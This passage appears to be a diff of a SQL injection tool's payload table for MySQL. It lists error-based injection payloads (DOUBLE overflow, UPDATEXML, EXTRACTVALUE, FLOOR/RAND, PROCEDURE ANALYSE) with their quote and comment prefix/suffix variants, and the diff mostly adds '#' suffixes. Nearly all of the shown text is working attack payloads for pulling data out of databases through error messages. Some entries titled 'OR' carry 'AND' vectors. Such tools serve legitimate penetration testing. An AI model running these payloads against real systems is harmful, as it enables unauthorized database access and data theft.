JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))", 646 - "dbms": "MySQL", 647 - }, 648 - { 649 - "payload": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 650 - "comments": [ 651 - # {"pref": " ", "suf": ""}, 652 - {"pref": " ", "suf": "-- wXyW"}, 653 - # {"pref": "' ", "suf": ""}, 654 - {"pref": "' ", "suf": "-- wXyW"}, 655 - # {"pref": '" ', "suf": ""}, 656 - {"pref": '" ', "suf": "-- wXyW"}, 657 - # {"pref": ") ", "suf": ""}, 658 - {"pref": ") ", "suf": "-- wXyW"}, 659 - # {"pref": "') ", "suf": ""}, 660 - {"pref": "') ", "suf": "-- wXyW"}, 661 - # {"pref": '") ', "suf": ""}, 662 - {"pref": '") ', "suf": "-- wXyW"}, 663 - ], 664 - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (DOUBLE)", 665 - "vector": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 666 - "dbms": "MySQL", 667 - }, 668 - { 669 - "payload": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 670 - "comments": [ 671 - # {"pref": " ", "suf": ""}, 672 - {"pref": " ", "suf": "-- wXyW"}, 673 - # {"pref": "' ", "suf": ""}, 674 - {"pref": "' ", "suf": "-- wXyW"}, 675 - # {"pref": '" ', "suf": ""}, 676 - {"pref": '" ', "suf": "-- wXyW"}, 677 - # {"pref": ") ", "suf": ""}, 678 - {"pref": ") ", "suf": "-- wXyW"}, 679 - # {"pref": "') ", "suf": ""}, 680 - {"pref": "') ", "suf": "-- wXyW"}, 681 - # {"pref": '") ', "suf": ""}, 682 - {"pref": '") ', "suf": "-- wXyW"}, 683 - ], 684 - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (DOUBLE)", 685 - "vector": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 686 - "dbms": "MySQL", 687 - }, 688 - { 689 - "payload": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e),0)", 690 - "comments": [ 691 - # {"pref": " ", "suf": ""}, 692 - {"pref": " ", "suf": "-- wXyW"}, 693 - # {"pref": "' ", "suf": ""}, 694 - {"pref": "' ", "suf": "-- wXyW"}, 695 - # {"pref": '" ', "suf": ""}, 696 - {"pref": '" ', "suf": "-- wXyW"}, 697 - # {"pref": ") ", "suf": ""}, 698 - {"pref": ") ", "suf": "-- wXyW"}, 699 - # {"pref": "') ", "suf": ""}, 700 - {"pref": "') ", "suf": "-- wXyW"}, 701 - # {"pref": '") ', "suf": ""}, 702 - {"pref": '") ', "suf": "-- wXyW"}, 703 - ], 704 - "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)", 705 - "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)", 793 + "title": "MySQL >= 5.1 AND string error-based - WHERE, HAVING , ORDER BY or GROUP BY clause (UPDATEXML )", 794 + "vector": "AND UPDATEXML(0,CONCAT_WS('(', '~',[INFERENCE],'~'),0)", 706 795 "dbms": "MySQL", 707 796 }, 708 797 { skipped 1 lines 710 799 "comments": [ 711 800 # {"pref": " ", "suf": ""}, 712 801 {"pref": " ", "suf": "-- wXyW"}, 802 + {"pref": " ", "suf": "#"}, 713 803 # {"pref": "' ", "suf": ""}, 714 804 {"pref": "' ", "suf": "-- wXyW"}, 805 + {"pref": "' ", "suf": "#"}, 715 806 # {"pref": '" ', "suf": ""}, 716 807 {"pref": '" ', "suf": "-- wXyW"}, 808 + {"pref": '" ', "suf": "#"}, 717 809 # {"pref": ") ", "suf": ""}, 718 810 {"pref": ") ", "suf": "-- wXyW"}, 811 + {"pref": ") ", "suf": "#"}, 719 812 # {"pref": "') ", "suf": ""}, 720 813 {"pref": "') ", "suf": "-- wXyW"}, 814 + {"pref": "') ", "suf": "#"}, 721 815 # {"pref": '") ', "suf": ""}, 722 816 {"pref": '") ', "suf": "-- wXyW"}, 817 + {"pref": '") ', "suf": "#"}, 723 818 ], 724 819 "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)", 725 820 "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)", skipped 4 lines 730 825 "comments": [ 731 826 # {"pref": " ", "suf": ""}, 732 827 {"pref": " ", "suf": "-- wXyW"}, 828 + {"pref": " ", "suf": "#"}, 733 829 # {"pref": "' ", "suf": ""}, 734 830 {"pref": "' ", "suf": "-- wXyW"}, 831 + {"pref": "' ", "suf": "#"}, 735 832 # {"pref": '" ', "suf": ""}, 736 833 {"pref": '" ', "suf": "-- wXyW"}, 834 + {"pref": '" ', "suf": "#"}, 737 835 # {"pref": ") ", "suf": ""}, 738 836 {"pref": ") ", "suf": "-- wXyW"}, 837 + {"pref": ") ", "suf": "#"}, 739 838 # {"pref": "') ", "suf": ""}, 740 839 {"pref": "') ", "suf": "-- wXyW"}, 840 + {"pref": "') ", "suf": "#"}, 741 841 # {"pref": '") ', "suf": ""}, 742 842 {"pref": '") ', "suf": "-- wXyW"}, 843 + {"pref": '") ', "suf": "#"}, 743 844 ], 744 845 "title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)", 745 846 "vector": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,[INFERENCE],FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)", skipped 4 lines 750 851 "comments": [ 751 852 # {"pref": " ", "suf": ""}, 752 853 {"pref": " ", "suf": "-- wXyW"}, 854 + {"pref": " ", "suf": "#"}, 753 855 # {"pref": "' ", "suf": ""}, 754 856 {"pref": "' ", "suf": "-- wXyW"}, 857 + {"pref": "' ", "suf": "#"}, 755 858 # {"pref": '" ', "suf": ""}, 756 859 {"pref": '" ', "suf": "-- wXyW"}, 860 + {"pref": '" ', "suf": "#"}, 757 861 # {"pref": ") ", "suf": ""}, 758 862 {"pref": ") ", "suf": "-- wXyW"}, 863 + {"pref": ") ", "suf": "#"}, 759 864 # {"pref": "') ", "suf": ""}, 760 865 {"pref": "') ", "suf": "-- wXyW"}, 866 + {"pref": "') ", "suf": "#"}, 761 867 # {"pref": '") ', "suf": ""}, 762 868 {"pref": '") ', "suf": "-- wXyW"}, 869 + {"pref": '") ', "suf": "#"}, 763 870 ], 764 871 "title": "MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)", 765 872 "vector": "OR 1 GROUP BY CONCAT_WS(0x7e,[INFERENCE],FLOOR(RAND(0)*2))HAVING(MIN(0))", skipped 4 lines 770 877 "comments": [ 771 878 # {"pref": " ", "suf": ""}, 772 879 {"pref": " ", "suf": "-- wXyW"}, 880 + {"pref": " ", "suf": "#"}, 773 881 # {"pref": "' ", "suf": ""}, 774 882 {"pref": "' ", "suf": "-- wXyW"}, 883 + {"pref": "' ", "suf": "#"}, 775 884 # {"pref": '" ', "suf": ""}, 776 885 {"pref": '" ', "suf": "-- wXyW"}, 886 + {"pref": '" ', "suf": "#"}, 777 887 # {"pref": ") ", "suf": ""}, 778 888 {"pref": ") ", "suf": "-- wXyW"}, 889 + {"pref": ") ", "suf": "#"}, 779 890 # {"pref": "') ", "suf": ""}, 780 891 {"pref": "') ", "suf": "-- wXyW"}, 892 + {"pref": "') ", "suf": "#"}, 781 893 # {"pref": '") ', "suf": ""}, 782 894 {"pref": '") ', "suf": "-- wXyW"}, 895 + {"pref": '") ', "suf": "#"}, 783 896 ], 784 897 "title": "MySQL >= 5.1 error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (PROCEDURE ANALYSE)", 785 898 "vector": "PROCEDURE ANALYSE(UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0),1)", skipped 4 lines 790 903 "comments": [ 791 904 # {"pref": " ", "suf": ""}, 792 905 {"pref": " ", "suf": "-- wXyW"}, 906 + {"pref": " ", "suf": "#"}, 793 907 # {"pref": "' ", "suf": ""}, 794 908 {"pref": "' ", "suf": "-- wXyW"}, 909 + {"pref": "' ", "suf": "#"}, 795 910 # {"pref": '" ', "suf": ""}, 796 911 {"pref": '" ', "suf": "-- wXyW"}, 912 + {"pref": '" ', "suf": "#"}, 797 913 # {"pref": ") ", "suf": ""}, 798 914 {"pref": ") ", "suf": "-- wXyW"}, 915 + {"pref": ") ", "suf": "#"}, 799 916 # {"pref": "') ", "suf": ""}, 800 917 {"pref": "') ", "suf": "-- wXyW"}, 918 + {"pref": "') ", "suf": "#"}, 801 919 # {"pref": '") ', "suf": ""}, 802 920 {"pref": '") ', "suf": "-- wXyW"}, 921 + {"pref": '") ', "suf": "#"}, 803 922 ], 804 923 "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)", 805 924 "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))", skipped 4 lines 810 929 "comments": [ 811 930 # {"pref": " ", "suf": ""}, 812 931 {"pref": " ", "suf": "-- wXyW"}, 932 + {"pref": " ", "suf": "#"}, 813 933 # {"pref": "' ", "suf": ""}, 814 934 {"pref": "' ", "suf": "-- wXyW"}, 935 + {"pref": "' ", "suf": "#"}, 815 936 # {"pref": '" ', "suf": ""}, 816 937 {"pref": '" ', "suf": "-- wXyW"}, 938 + {"pref": '" ', "suf": "#"}, 817 939 # {"pref": ") ", "suf": ""}, 818 940 {"pref": ") ", "suf": "-- wXyW"}, 941 + {"pref": ") ", "suf": "#"}, 819 942 # {"pref": "') ", "suf": ""}, 820 943 {"pref": "') ", "suf": "-- wXyW"}, 944 + {"pref": "') ", "suf": "#"}, 821 945 # {"pref": '") ', "suf": ""}, 822 946 {"pref": '") ', "suf": "-- wXyW"}, 947 + {"pref": '") ', "suf": "#"}, 823 948 ], 824 949 "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)", 825 950 "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))", skipped 959 lines